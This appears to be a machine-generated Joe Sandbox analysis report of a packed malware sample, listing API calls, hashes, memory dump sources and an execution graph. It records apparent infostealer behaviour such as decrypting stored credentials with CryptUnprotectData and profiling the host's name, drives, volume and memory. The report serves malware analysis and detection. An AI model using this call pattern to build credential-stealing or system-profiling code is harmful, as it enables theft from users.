                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                                            • Opcode ID: dd5fd79015d347857cc5896a31ede9a06e4ee3743a23cc07c5e1bdaea41bc249
                                                                                                                                                                                                                                            • Instruction ID: baa3ded6d0d781719c3a4b1ef36e7b4cd60e24f8fedd66218d118ca1624ce54a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd5fd79015d347857cc5896a31ede9a06e4ee3743a23cc07c5e1bdaea41bc249
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE512371E06606EFDB058F51D860BAA77B4EF04318F224129F95547AB4EF32F845C790
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 6CDDD4FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDDF480,?,00000000,-00000008), ref: 6CDDD55B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6CDDC1AA
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 6CDDC1B1
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 6CDDC1EB
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 6CDDC1F2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                                            • Opcode ID: 503b1b24cdbf3e36c5953dc00e64189cab5a25cde46c9ebaa2679fe47b90ecf7
                                                                                                                                                                                                                                            • Instruction ID: d5a405a2b04afd5253f54b862f52ef28d3b7ec2bbb5bf7315d52d83eb6939e78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 503b1b24cdbf3e36c5953dc00e64189cab5a25cde46c9ebaa2679fe47b90ecf7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5021A731E48215EF9B10AFA6C84095BBBBDEF85368B06461AF95597A70D731FC008BA1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6CDDD5A5
                                                                                                                                                                                                                                              • Part of subcall function 6CDDD4FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDDF480,?,00000000,-00000008), ref: 6CDDD55B
                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDDD5DD
                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDDD5FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                                            • Opcode ID: f9a4824807214537955cbe19fa3434fc1496ae9680ac0f4aaa6fcd96603cc055
                                                                                                                                                                                                                                            • Instruction ID: e25049b6ce1964f993c5bc8eb5b52ed669639754c15e44ba43f0ff620944fb0c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a4824807214537955cbe19fa3434fc1496ae9680ac0f4aaa6fcd96603cc055
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C911D6B1E09519BFAF1127F68C88CBF2A7CDF9A29C7060125F505D1620EB64FD044BB4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE136D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE1379
                                                                                                                                                                                                                                              • Part of subcall function 6CDE133F: CloseHandle.KERNEL32(FFFFFFFE,6CDE1389,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE134F
                                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 6CDE1389
                                                                                                                                                                                                                                              • Part of subcall function 6CDE1301: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDE1330,6CDE0B03,?,?,6CDDFDD4), ref: 6CDE1314
                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,?,00000000,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE139E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                                            • Opcode ID: b9761d891eb5faaf6b1467e0cc71496f73e04bde6cba77ed2aad262833499b88
                                                                                                                                                                                                                                            • Instruction ID: 34e9ccf2301eb06e1618045766513b0ecbe5713ed436773714d1d7e24ee7bb65
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9761d891eb5faaf6b1467e0cc71496f73e04bde6cba77ed2aad262833499b88
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F09836600119FBCF522FD68D04AC93F7AFB0D3A5B244520FB1895921C732C920DB95

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:16.8%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:43.1%
                                                                                                                                                                                                                                            Total number of Nodes:420
                                                                                                                                                                                                                                            Total number of Limit Nodes:33
                                                                                                                                                                                                                                            execution_graph 11785 41ec00 11789 41ec3b 11785->11789 11786 41ec9e 11787 41ed7e 11786->11787 11788 431c50 RtlAllocateHeap 11786->11788 11791 41ecd8 11788->11791 11789->11786 11793 433420 LdrInitializeThunk 11789->11793 11791->11787 11794 433420 LdrInitializeThunk 11791->11794 11793->11786 11794->11787 11795 40f403 11796 40f410 11795->11796 11796->11796 11797 40feb1 11796->11797 11798 416d10 LdrInitializeThunk 11796->11798 11799 40fea7 11798->11799 11801 40a0a0 11799->11801 11802 40a0b5 11801->11802 11804 40a0ee 11801->11804 11805 42ea20 11802->11805 11804->11797 11806 42ea89 11805->11806 11807 42eb16 11806->11807 11808 42eb77 11806->11808 11809 42eb52 GetVolumeInformationW 11806->11809 11807->11804 11808->11807 11810 431c50 RtlAllocateHeap 11808->11810 11814 42edee 11808->11814 11816 42ee14 11808->11816 11809->11807 11809->11808 11815 42ed42 11810->11815 11811 432000 LdrInitializeThunk 11811->11814 11814->11811 11814->11816 11821 432130 11814->11821 11825 432220 11814->11825 11815->11814 11820 433420 LdrInitializeThunk 11815->11820 11816->11807 11819 433420 LdrInitializeThunk 11816->11819 11819->11807 11820->11814 11822 4321de 11821->11822 11823 43213a 11821->11823 11822->11814 11823->11822 11833 433420 LdrInitializeThunk 11823->11833 11826 43222f 11825->11826 11830 432410 11825->11830 11826->11830 11831 4322de 11826->11831 11834 433420 LdrInitializeThunk 11826->11834 11827 4323de 11828 432130 LdrInitializeThunk 11827->11828 11827->11830 11828->11830 11830->11814 11831->11827 11835 433420 LdrInitializeThunk 11831->11835 11833->11822 11834->11831 11835->11827 11836 414b89 11838 414b90 11836->11838 11837 4150a8 CryptUnprotectData 11839 4150cd 11837->11839 11838->11837 11839->11839 11840 41538c 11841 4153d6 11840->11841 11842 415442 11841->11842 11843 4154f7 11841->11843 11845 415503 11841->11845 11848 4157d0 2 API calls 11842->11848 11849 402a80 RtlFreeHeap 11843->11849 11844 4157f8 11875 4140a0 11844->11875 11845->11843 11845->11844 11846 4157a8 11845->11846 11857 435940 LdrInitializeThunk 11845->11857 11862 4157d0 11845->11862 11848->11843 11849->11846 11851 415894 11852 4140a0 LdrInitializeThunk 11851->11852 11853 415944 11852->11853 11854 4140a0 LdrInitializeThunk 11853->11854 11855 415a24 11854->11855 11856 4140a0 LdrInitializeThunk 11855->11856 11860 415ac4 11856->11860 11857->11845 11859 4140a0 LdrInitializeThunk 11859->11860 11860->11859 11861 41611b 11860->11861 11887 42ed00 11860->11887 11863 4157f8 11862->11863 11869 415ac4 11862->11869 11864 4140a0 LdrInitializeThunk 11863->11864 11865 415894 11864->11865 11866 4140a0 LdrInitializeThunk 11865->11866 11867 415944 11866->11867 11868 4140a0 LdrInitializeThunk 11867->11868 11870 415a24 11868->11870 11869->11869 11871 42ed00 2 API calls 11869->11871 11873 4140a0 LdrInitializeThunk 11869->11873 11874 41611b 11869->11874 11872 4140a0 LdrInitializeThunk 11870->11872 11871->11869 11872->11869 11873->11869 11874->11845 11876 4140c0 11875->11876 11876->11876 11877 435760 LdrInitializeThunk 11876->11877 11878 4141ae 11877->11878 11879 4141bf 11878->11879 11880 435b30 LdrInitializeThunk 11878->11880 11881 4141fc 11878->11881 11882 41422b 11878->11882 11883 41445e 11878->11883 11879->11851 11880->11881 11881->11879 11881->11882 11881->11883 11884 435c30 LdrInitializeThunk 11881->11884 11882->11879 11882->11883 11900 433420 LdrInitializeThunk 11882->11900 11901 433420 LdrInitializeThunk 11883->11901 11884->11882 11888 435760 LdrInitializeThunk 11887->11888 11889 42ed22 11888->11889 11890 42ed31 11889->11890 11893 431c50 RtlAllocateHeap 11889->11893 11895 42ee14 11889->11895 11899 42edee 11889->11899 11890->11860 11891 432000 LdrInitializeThunk 11891->11899 11892 432130 LdrInitializeThunk 11892->11899 11896 42ed42 11893->11896 11894 432220 LdrInitializeThunk 11894->11899 11895->11890 11902 433420 LdrInitializeThunk 11895->11902 11896->11899 11903 433420 LdrInitializeThunk 11896->11903 11899->11891 11899->11892 11899->11894 11899->11895 11900->11883 11901->11883 11902->11890 11903->11899 11500 409450 11501 409463 11500->11501 11523 432fe0 11501->11523 11503 40947e 11505 40956a CreateMutexW 11503->11505 11517 409482 ExitProcess 11503->11517 11506 40958f 11505->11506 11507 409593 11506->11507 11508 409598 CoInitializeEx 11506->11508 11512 409663 11507->11512 11513 409665 CloseHandle 11507->11513 11508->11507 11509 4095c1 CoInitializeSecurity 11508->11509 11510 40961d 11509->11510 11511 40961f 11509->11511 11514 409651 CoUninitialize 11510->11514 11537 40a700 11511->11537 11552 433320 11512->11552 11513->11512 11514->11507 11518 409628 11518->11514 11519 409624 11519->11518 11544 40cfa0 11519->11544 11535 433031 11523->11535 11524 4332e0 11525 433304 GetLogicalDrives 11524->11525 11555 42df70 11525->11555 11526 43330f GetLogicalDrives 11531 42df70 LdrInitializeThunk 11526->11531 11527 43335f 11532 4333db RtlReAllocateHeap 11527->11532 11533 4331f7 11527->11533 11528 4333f1 11559 431c50 11528->11559 11534 43331a 11531->11534 11532->11533 11533->11503 11536 42df70 LdrInitializeThunk 11534->11536 11535->11524 11535->11525 11535->11526 11535->11527 11535->11528 11535->11533 11536->11534 11539 40a762 11537->11539 11540 40a9c0 GetProcessVersion 11539->11540 11543 40ac44 11539->11543 11567 40af00 11539->11567 11542 40aadd 11540->11542 11541 40af00 2 API calls 11541->11543 11542->11541 11542->11543 11543->11519 11546 40cff2 11544->11546 11545 40be90 2 API calls 11551 40d441 11545->11551 11546->11545 11546->11546 11547 40d4e1 11581 401ee0 11547->11581 11548 40d462 GetSystemDirectoryW 11548->11551 11550 40d4e7 11551->11547 11551->11548 11625 434530 11552->11625 11554 433325 FreeLibrary 11554->11517 11556 42dfa0 11555->11556 11558 42e604 11556->11558 11562 435940 11556->11562 11558->11526 11560 431cc9 RtlAllocateHeap 11559->11560 11561 431c87 11559->11561 11560->11533 11561->11560 11561->11561 11563 435960 11562->11563 11564 435ade 11563->11564 11566 433420 LdrInitializeThunk 11563->11566 11564->11558 11566->11564 11568 40af49 11567->11568 11571 40be90 11568->11571 11570 40b1b4 11570->11539 11572 40c112 11571->11572 11574 40c1e7 11572->11574 11575 433340 11572->11575 11574->11570 11576 4333f1 11575->11576 11577 43335f 11575->11577 11578 4333f7 11575->11578 11579 431c50 RtlAllocateHeap 11576->11579 11577->11578 11580 4333db RtlReAllocateHeap 11577->11580 11578->11572 11579->11578 11580->11578 11582 401ee8 11581->11582 11583 401f0c 11581->11583 11586 401f10 11582->11586 11583->11550 11585 401f0b 11585->11550 11587 401f25 11586->11587 11589 401f6b 11586->11589 11588 4021f1 11587->11588 11587->11589 11590 402107 11587->11590 11592 402241 11587->11592 11608 403040 11588->11608 11589->11585 11607 431c50 RtlAllocateHeap 11590->11607 11592->11589 11594 40231d 11592->11594 11602 40229c 11592->11602 11593 40210f 11593->11589 11593->11594 11606 402185 11593->11606 11612 402a80 11594->11612 11596 403040 RtlFreeHeap 11596->11606 11597 401f10 2 API calls 11597->11602 11598 402a80 RtlFreeHeap 11598->11589 11599 4021c1 11599->11589 11599->11598 11600 402620 11601 402a80 RtlFreeHeap 11600->11601 11601->11599 11602->11589 11602->11597 11602->11599 11602->11600 11603 401f10 2 API calls 11603->11606 11604 4025fc 11605 402a80 RtlFreeHeap 11604->11605 11605->11599 11606->11589 11606->11596 11606->11599 11606->11600 11606->11603 11606->11604 11607->11593 11609 4032db 11608->11609 11610 403055 11608->11610 11609->11589 11610->11609 11621 431d1d 11610->11621 11613 402a8e 11612->11613 11619 402b19 11612->11619 11614 402b59 11613->11614 11616 402aa3 11613->11616 11613->11619 11617 402a80 RtlFreeHeap 11614->11617 11614->11619 11615 402ae3 11620 431d1d RtlFreeHeap 11615->11620 11616->11615 11618 402a80 RtlFreeHeap 11616->11618 11616->11619 11617->11614 11618->11616 11620->11619 11622 431da3 11621->11622 11623 431d2b RtlFreeHeap 11621->11623 11622->11609 11623->11622 11626 434539 11625->11626 11626->11554 11632 41b7d0 11633 41b848 11632->11633 11633->11633 11634 435940 LdrInitializeThunk 11633->11634 11635 41ba64 11634->11635 11636 41bbb1 11635->11636 11637 41bcd1 11635->11637 11638 419430 LdrInitializeThunk 11635->11638 11640 419430 11636->11640 11638->11636 11643 435760 11640->11643 11642 419478 11644 435780 11643->11644 11645 4358ee 11644->11645 11647 433420 LdrInitializeThunk 11644->11647 11645->11642 11647->11645 11648 41f7d0 11649 41f8a6 11648->11649 11660 435fe0 11649->11660 11653 435760 LdrInitializeThunk 11657 41fa35 11653->11657 11656 41fbe2 11657->11653 11657->11656 11680 433420 LdrInitializeThunk 11657->11680 11681 435b30 11657->11681 11658 41f945 11658->11656 11658->11657 11658->11658 11672 436b90 11658->11672 11662 436000 11660->11662 11661 41f919 11661->11656 11661->11657 11661->11658 11664 436470 11661->11664 11662->11661 11685 433420 LdrInitializeThunk 11662->11685 11667 4364a3 11664->11667 11665 43650e 11666 431c50 RtlAllocateHeap 11665->11666 11671 4365ee 11665->11671 11669 43654e 11666->11669 11667->11665 11686 433420 LdrInitializeThunk 11667->11686 11669->11671 11687 433420 LdrInitializeThunk 11669->11687 11671->11658 11674 436bb0 11672->11674 11673 436c8e 11673->11673 11675 431c50 RtlAllocateHeap 11673->11675 11679 436dee 11673->11679 11674->11673 11688 433420 LdrInitializeThunk 11674->11688 11677 436d41 11675->11677 11677->11679 11689 433420 LdrInitializeThunk 11677->11689 11679->11657 11680->11657 11683 435b65 11681->11683 11682 435bde 11682->11657 11683->11682 11690 433420 LdrInitializeThunk 11683->11690 11685->11661 11686->11665 11687->11671 11688->11673 11689->11679 11690->11682 11904 41c490 11905 41c4a3 11904->11905 11905->11905 11906 435fe0 LdrInitializeThunk 11905->11906 11909 41c598 11906->11909 11907 436470 2 API calls 11907->11909 11908 436120 2 API calls 11908->11909 11909->11907 11909->11908 11910 41c691 11909->11910 11912 41c479 11909->11912 11911 435fe0 LdrInitializeThunk 11910->11911 11911->11912 11913 40bb91 11915 40bba6 11913->11915 11917 40bcd9 11913->11917 11914 433340 2 API calls 11914->11915 11915->11914 11915->11915 11915->11917 11918 40be62 11915->11918 11916 433340 2 API calls 11916->11918 11918->11916 11918->11917 11918->11918 11919 41f090 11929 41f0b0 11919->11929 11930 41f11f 11929->11930 11930->11930 11933 431db0 11930->11933 11932 41f16c 11934 431ded 11933->11934 11937 431e4e 11934->11937 11941 433420 LdrInitializeThunk 11934->11941 11935 431f2e 11935->11932 11936 431c50 RtlAllocateHeap 11939 431e8f 11936->11939 11937->11935 11937->11936 11939->11935 11942 433420 LdrInitializeThunk 11939->11942 11941->11937 11942->11935 11943 414893 11944 414898 11943->11944 11945 435760 LdrInitializeThunk 11944->11945 11946 414a0d 11945->11946 11947 42d390 11948 435760 LdrInitializeThunk 11947->11948 11949 42d3ba 11948->11949 11695 41e3d9 11697 41e3c0 11695->11697 11696 435fe0 LdrInitializeThunk 11696->11697 11697->11695 11697->11696 11698 41e578 11697->11698 11704 41e592 11697->11704 11700 436470 2 API calls 11698->11700 11699 435fe0 LdrInitializeThunk 11699->11704 11700->11704 11701 433340 2 API calls 11701->11704 11702 436b90 2 API calls 11702->11704 11704->11699 11704->11701 11704->11702 11705 433420 LdrInitializeThunk 11704->11705 11706 436120 11704->11706 11705->11704 11709 436155 11706->11709 11707 4361ce 11707->11707 11708 431c50 RtlAllocateHeap 11707->11708 11713 43632e 11707->11713 11711 436281 11708->11711 11709->11707 11714 433420 LdrInitializeThunk 11709->11714 11711->11713 11715 433420 LdrInitializeThunk 11711->11715 11713->11704 11714->11707 11715->11713 11950 419d9a 11951 431c50 RtlAllocateHeap 11950->11951 11952 419da6 11951->11952 11953 42a39f 11954 42a3a4 11953->11954 11955 42a3df KiUserCallbackDispatcher GetSystemMetrics 11954->11955 11956 42a41a DeleteObject 11955->11956 11958 42a460 SelectObject 11956->11958 11960 42a4e0 SelectObject 11958->11960 11961 42a4fd DeleteObject 11960->11961 11963 42a53d 11961->11963 11964 41d6a1 11965 41d481 11964->11965 11967 41d460 11964->11967 11965->11964 11965->11967 11968 435fe0 LdrInitializeThunk 11965->11968 11969 4367a0 11965->11969 11967->11967 11968->11965 11972 4367d3 11969->11972 11970 43684e 11971 431c50 RtlAllocateHeap 11970->11971 11976 43692e 11970->11976 11974 43688f 11971->11974 11972->11970 11977 433420 LdrInitializeThunk 11972->11977 11974->11976 11978 433420 LdrInitializeThunk 11974->11978 11976->11965 11977->11970 11978->11976 11720 418960 11721 41896e 11720->11721 11725 4189b0 11720->11725 11726 418a70 11721->11726 11723 418a2c 11724 416ec0 LdrInitializeThunk 11723->11724 11723->11725 11724->11725 11727 418ac4 11726->11727 11728 435940 LdrInitializeThunk 11727->11728 11729 418bd1 11728->11729 11730 41c260 11731 41c318 11730->11731 11734 416d10 11731->11734 11735 416d30 11734->11735 11736 435940 LdrInitializeThunk 11735->11736 11738 416d89 11736->11738 11737 416e7f 11738->11737 11738->11738 11739 419430 LdrInitializeThunk 11738->11739 11739->11737 11740 4282e6 11743 4096b0 11740->11743 11742 4282eb CoSetProxyBlanket 11743->11742 11744 42d2e7 11745 42d30f 11744->11745 11746 42d31e GetUserDefaultUILanguage 11745->11746 11747 426dea 11749 426e4d SysAllocString 11747->11749 11750 426f11 11749->11750 11751 414a6b 11752 414a7b 11751->11752 11755 435c30 11752->11755 11757 435c63 11755->11757 11756 435cde 11758 414a90 11756->11758 11762 433420 LdrInitializeThunk 11756->11762 11757->11756 11761 433420 LdrInitializeThunk 11757->11761 11761->11756 11762->11758 11983 433daf 11984 433546 11983->11984 11986 433a22 11984->11986 11990 433840 11984->11990 11991 433751 11984->11991 11994 433420 LdrInitializeThunk 11984->11994 11985 4337fe 11985->11986 11985->11990 11987 4339ee 11986->11987 11997 433420 LdrInitializeThunk 11986->11997 11990->11987 11996 433420 LdrInitializeThunk 11990->11996 11991->11985 11995 433420 LdrInitializeThunk 11991->11995 11994->11984 11995->11985 11996->11987 11997->11986 12002 422eb0 12004 422ecb 12002->12004 12005 423455 12004->12005 12022 42e6e0 12004->12022 12005->12005 12006 4243aa 12007 4244f1 GetComputerNameExA 12006->12007 12008 424560 12007->12008 12008->12008 12009 42460f GetComputerNameExA 12008->12009 12013 424690 12009->12013 12010 423f36 12010->12006 12010->12010 12011 4244cf FreeLibrary 12010->12011 12011->12006 12012 424dce 12013->12012 12013->12013 12014 42ea20 3 API calls 12013->12014 12015 424eaa 12014->12015 12016 424ef5 GetPhysicallyInstalledSystemMemory 12015->12016 12017 424f1a 12016->12017 12019 4255d9 12017->12019 12020 42549e 12017->12020 12030 433420 LdrInitializeThunk 12017->12030 12019->12019 12020->12019 12021 425ffb FreeLibrary 12020->12021 12021->12019 12023 42e714 12022->12023 12025 42e77a 12023->12025 12032 433420 LdrInitializeThunk 12023->12032 12027 42e9b2 12025->12027 12029 42e88c 12025->12029 12031 433420 LdrInitializeThunk 12025->12031 12027->12010 12029->12027 12033 433420 LdrInitializeThunk 12029->12033 12030->12020 12031->12025 12032->12023 12033->12029 12034 4211b0 12035 421183 12034->12035 12037 4211ce 12034->12037 12036 435b30 LdrInitializeThunk 12036->12037 12037->12035 12037->12036 12037->12037 12038 435760 LdrInitializeThunk 12037->12038 12038->12037 11763 4285fb VariantInit 11764 428667 11763->11764 12039 429a39 CoSetProxyBlanket 11765 40f27f 11770 40f290 11765->11770 11767 4106fe 11768 40a0a0 GetVolumeInformationW RtlAllocateHeap LdrInitializeThunk 11767->11768 11769 410439 11768->11769 11770->11769 11770->11770 11771 414570 11770->11771 11772 414590 11771->11772 11772->11772 11773 435760 LdrInitializeThunk 11772->11773 11775 41476a 11773->11775 11774 435b30 LdrInitializeThunk 11774->11775 11775->11774 11776 4147c5 11775->11776 11777 435c30 LdrInitializeThunk 11775->11777 11780 433420 LdrInitializeThunk 11776->11780 11777->11775 11779 414d06 11780->11779

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 60 41c490-41c51a call 408d00 63 41c579-41c59e call 435fe0 60->63 64 41c51c-41c51f 60->64 68 41c651-41c65c 63->68 69 41c5d3-41c5d5 63->69 70 41c5a5-41c5cc call 436470 63->70 71 41c5f6-41c60b 63->71 72 41c5da-41c5ef 63->72 65 41c520-41c577 64->65 65->63 65->65 78 41c663-41c68a call 408d30 call 436120 68->78 79 41c65e 68->79 74 41dfa7-41dfae 69->74 70->68 70->69 70->71 70->72 71->68 71->69 71->70 71->71 71->72 75 41c640-41c64a 71->75 76 41c486-41c48d 71->76 77 41c479-41c483 call 408d40 71->77 72->68 72->71 75->68 75->71 77->76 78->75 87 41c691-41c6a2 call 435fe0 78->87 88 41c6c0-41c8b9 78->88 89 41c6b6 78->89 79->78 93 41c6a7-41c6af 87->93 91 41c91b-41cbef 88->91 92 41c8bb 88->92 89->88 95 41cbf1 91->95 96 41cc5b-41ce7e 91->96 94 41c8c0-41c919 92->94 93->88 93->89 94->91 94->94 97 41cc00-41cc59 95->97 98 41ce80-41ced9 96->98 99 41cedb-41d105 96->99 97->96 97->97 98->98 98->99 100 41d107 99->100 101 41d16b-41d38b 99->101 102 41d110-41d169 100->102 103 41d3eb-41d46f 101->103 104 41d38d-41d38f 101->104 102->101 102->102 103->74 105 41d390-41d3e9 104->105 105->103 105->105
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: qw$" $%] S$+QvW$3E-[$79$89$86$9Y%_$=!$F5.K$G!P'$H=^3$K9D?$W%M;$[1O7$e%h'$ef$n!m#$q-[#$r=Z?$rq$!#$9;$=?$uw$yZ{
                                                                                                                                                                                                                                            • API String ID: 0-3357453141
                                                                                                                                                                                                                                            • Opcode ID: f0346f04f7dab28207e766204a78d4f9ce3c5e34d5ba849c1a1f99b64a8fd511
                                                                                                                                                                                                                                            • Instruction ID: ded4875e04283c62bef3b85bcac0d4d4c478bcc78591e6b4320f93d218dd1299
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0346f04f7dab28207e766204a78d4f9ce3c5e34d5ba849c1a1f99b64a8fd511
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E72E8B42093818FE234DF16D881BEBBBE1BB86344F108A2DD5DD9B245DB748146CF96
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 7;/8$O\PB$PDYY$SSHN$hFtL$srox$%$AG
                                                                                                                                                                                                                                            • API String ID: 0-1037250187
                                                                                                                                                                                                                                            • Opcode ID: bd53928cf83f23d74e3ea7080d5fb51ad646155f1b6176379b169a5e63831b20
                                                                                                                                                                                                                                            • Instruction ID: 18550353a4f00b3ef38631325a69d30dea7ce0b6d22f1bdeda8d5f565c17f2af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd53928cf83f23d74e3ea7080d5fb51ad646155f1b6176379b169a5e63831b20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85430170204B918BD325CF39D4943A3FBE2AF96304F548A5EC4EB8B792D778A445CB58

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
